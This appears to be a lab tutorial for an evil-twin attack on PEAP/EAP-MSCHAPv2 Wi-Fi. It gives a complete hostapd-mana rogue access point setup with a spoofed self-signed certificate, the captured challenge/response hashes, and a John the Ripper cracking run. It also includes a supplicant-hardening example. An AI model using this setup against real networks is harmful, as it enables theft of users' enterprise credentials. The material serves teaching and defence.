PEAP EAP-MSCHAPV2 Attack

References:

  1. hostapd
  2. Hostapd-mana
  3. OpenSSL
  4. hostapd.eap_user

Generate a new RSA key pair for the server certificate; the last argument is the modulus size in bits (2048 here).

openssl genrsa -out server.key 2048

Create a certificate signing request.

└─$ openssl req -new -sha256 -key server.key -out csr.csr

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:New York
Locality Name (eg, city) []:New York
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Secure Wireless INC.
Organizational Unit Name (eg, section) []:Secure Wireless
Common Name (e.g. server FQDN or YOUR name) []:encrypted.securewireless.com
Email Address []:security@securewireless.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:Secure Wireless INC.

Self-sign the request to produce the server certificate, valid for 365 days.

openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem

Generate Diffie-Hellman parameters for the TLS tunnel. Because the certificate is self-signed it is its own issuer, so ca.pem can simply point at server.pem.

openssl dhparam 2048 > dhparam.pem
ln -s server.pem ca.pem

Create the hostapd.eap_user file. The first line lists the phase-1 (outer) EAP methods offered to any identity; the line marked [2] defines the phase-2 (inner) methods, here for the identity "t" with the password "1234test".

└─$ sudo nano hostapd.eap_user
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Create the hostapd-mana fake AP.

sudo nano fakeap2.conf

interface=wlan0
ssid=03252022
hw_mode=g
driver=nl80211
channel=6
auth_algs=3
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
ieee8021x=1
eap_server=1
eap_user_file=/home/lab/Downloads/hostapd-mana/test2/hostapd.eap_user
ca_cert=/home/lab/Downloads/hostapd-mana/test2/ca.pem
dh_file=/home/lab/Downloads/hostapd-mana/test2/dhparam.pem
server_cert=/home/lab/Downloads/hostapd-mana/test2/server.pem
private_key=/home/lab/Downloads/hostapd-mana/test2/server.key
mana_wpe=1
mana_eapsuccess=1
mana_credout=hostapd.creds
enable_sycophant=1
sycophant_dir=/tmp/

Start the fake AP with hostapd-mana.

sudo hostapd-mana fakeap2.conf

The SSID is now being broadcast over the air.


Use airodump-ng to verify the authentication type. MGT in the AUTH column means the network uses 802.1X (enterprise) authentication.

sudo airodump-ng --band abg wlan2 --channel 6 --essid 03252022 -w 03252022-CAPTURE

Connecting a client

This is where educating users on the dangers of trusting certificates presented on the wireless network matters. The fake certificate created earlier is what is being presented to the user.

Attackers can be creative when generating fake certificates; the one above reuses the organization's name and a plausible server FQDN so that the prompt looks legitimate, which is exactly why users should not accept a certificate just because the names look right.
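The supplicant-side mitigation, as an added example that is not part of the original post: a wpa_supplicant network block that would accept the self-signed certificate created above, beside one that pins the organization's CA and the expected server name. The CA file path, server FQDN and password are assumed placeholder values; the SSID and identity are the ones used in this post.

```conf
# Added example (not from the original post): two wpa_supplicant network
# blocks for the PEAP/MS-CHAPv2 network shown above.

# WEAK: with no ca_cert the client trusts whatever certificate the AP
# presents, including the self-signed server.pem created earlier, and
# then runs MS-CHAPv2 inside a tunnel terminated by the fake AP.
network={
    ssid="03252022"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="wirelessuser"
    # placeholder password
    password="changeme"
    phase2="auth=MSCHAPV2"
}

# HARDENED: the TLS tunnel is only established if the server chain
# validates against the organization's CA and the certificate carries
# the expected RADIUS server name. A self-signed certificate fails both
# checks, so no inner MS-CHAPv2 exchange ever takes place.
network={
    ssid="03252022"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="wirelessuser"
    # placeholder password
    password="changeme"
    # assumed path to the corporate CA that issued the real RADIUS certificate
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # assumed FQDN; must match a dNSName in the RADIUS server certificate
    domain_match="radius.securewireless.com"
    phase2="auth=MSCHAPV2"
}
```

Windows and Android supplicants expose the same two controls in their EAP profile (a trusted root CA and an expected server name), and the attack on this page works only when one or both are left unset.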


Let's take a look at the layer two packet capture. The fake AP behaves like a legitimate AP toward the client; its built-in EAP server (eap_server=1) stands in for the RADIUS server.

The wireless device goes through the standard probe, association, EAP identity request, and EAP exchange. The attacker aims to trick the user into entering their network credentials.
Let's take a look at what the attacker was able to capture.

The attacker is able to see the username, and hostapd-mana captured the MS-CHAPv2 challenge/response for the credentials, printed in asleap, John the Ripper and hashcat formats.

└─$ sudo hostapd-mana fakeap2.conf

Configuration file: fakeap2.conf
MANA: Captured credentials will be written to file 'hostapd.creds'.
Using interface wlan0 with hwaddr 00:11:22:33:44:00 and ssid "03252022"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: authenticated
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 5e:05:3d:f0:3e:3e
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: wirelessuser
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: wirelessuser
MANA EAP EAP-MSCHAPV2 ASLEAP user=wirelessuser | asleap -C e2:68:ff:a0:c2:5d:fc:59 -R fd:26:a7:a3:6e:a2:a3:6f:8f:9c:f4:5e:a1:1c:d4:ce:8d:72:36:1a:ec:26:66:f2
MANA EAP EAP-MSCHAPV2 JTR | wirelessuser:$NETNTLM$e268ffa0c25dfc59$fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | wirelessuser::::fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:e268ffa0c25dfc59
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): cf 0c 65 bf 82 cb ed 00 c0 04 33 9d e5 98 bd 21
wlan0: CTRL-EVENT-EAP-SUCCESS 5e:05:3d:f0:3e:3e
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: disassociated
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: deauthenticated due to inactivity (timer DEAUTH/REMOVE)
^Cwlan0: interface state ENABLED->DISABLED
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0

Create a file and add the JTR (John the Ripper) line.

└─$ nano hash.txt

cat hash.txt
wirelessuser:$NETNTLM$e268ffa0c25dfc59$fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:::::::

Attempt to crack the password with John the Ripper.

└─$ sudo john --format=netntlm -w /pentest/rockyou.txt hash.txt

Warning: invalid UTF-8 seen reading /pentest/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
Summer           (wirelessuser)
1g 0:00:00:00 DONE (2023-03-25 16:37) 100.0g/s 204000p/s 204000c/s 204000C/s queenie..passw0rd
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.
